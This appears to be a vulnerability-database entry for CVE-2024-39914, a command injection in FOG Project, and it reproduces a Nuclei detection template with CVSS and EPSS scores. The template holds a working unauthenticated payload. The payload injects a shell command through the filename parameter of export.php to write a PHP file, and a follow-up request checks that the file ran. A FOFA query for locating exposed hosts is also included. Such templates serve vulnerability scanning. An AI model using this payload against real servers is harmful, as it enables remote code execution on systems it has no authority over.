Lucene search

ProjectDiscoveryNUCLEI:CVE-2024-39914

HistoryJul 24, 2024 - 7:39 p.m.

FOG Project < 1.5.10.34 - Remote Command Execution

2024-07-2419:39:34

ProjectDiscovery

github.com

fog project

remote command execution

critical severity

command injection

php

security advisory

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

7.5

Confidence

High

EPSS

0.001

Percentile

22.0%

JSON

FOG is a cloning/imaging/rescue suite/inventory management system. Prior to 1.5.10.34, packages/web/lib/fog/reportmaker.class.php in FOG was affected by a command injection via the filename parameter to /fog/management/export.php.

id: CVE-2024-39914

info:
  name: FOG Project < 1.5.10.34 - Remote Command Execution
  author: securityforeveryone
  severity: critical
  description: |
    FOG is a cloning/imaging/rescue suite/inventory management system. Prior to 1.5.10.34, packages/web/lib/fog/reportmaker.class.php in FOG was affected by a command injection via the filename parameter to /fog/management/export.php.
  remediation: Fixed in 1.5.10.34
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-39914
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-39914
    - https://github.com/FOGProject/fogproject/security/advisories/GHSA-7h44-6vq6-cq8j
    - https://blog.csdn.net/qq_39894062/article/details/140550009
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-39914
    cwe-id: CWE-77
    epss-score: 0.00043
    epss-percentile: 0.09367
  metadata:
    vendor: fogproject
    product: fogproject
    fofa-query: icon_hash="-1952619005"
  tags: cve,cve2024,rce,fog

variables:
  filename: "{{to_lower(rand_text_alpha(12))}}"
  num: "{{rand_int(1000, 9999)}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /management/export.php?filename=$(echo+'<?php+echo+md5({{num}});+?>'+>+{{filename}}.php)&type=pdf HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        fogguiuser=fog&nojson=2

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"No HTML files!","HTMLDOC")'
          - 'contains(content_type, "application/pdf")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        GET /management/{{filename}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"{{md5(num)}}")'
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022075ee2c37d4da90160d134db9e8e9df85d9b449f9095211cc0cb9371aac4dcf53022100de284762c25011f52d379931b93129ff859eb86b044cc0954ea631adfb0b4844:922c64590222798bb761d5b6d8e72950

References

blog.csdn.net/qq_39894062/article/details/140550009

cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-39914

github.com/FOGProject/fogproject/security/advisories/GHSA-7h44-6vq6-cq8j

nvd.nist.gov/vuln/detail/CVE-2024-39914

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

7.5

Confidence

High

EPSS

0.001

Percentile

22.0%

JSON

Related for NUCLEI:CVE-2024-39914